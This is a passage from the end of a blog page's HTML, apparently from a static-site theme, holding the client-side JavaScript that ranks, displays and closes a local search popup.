              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
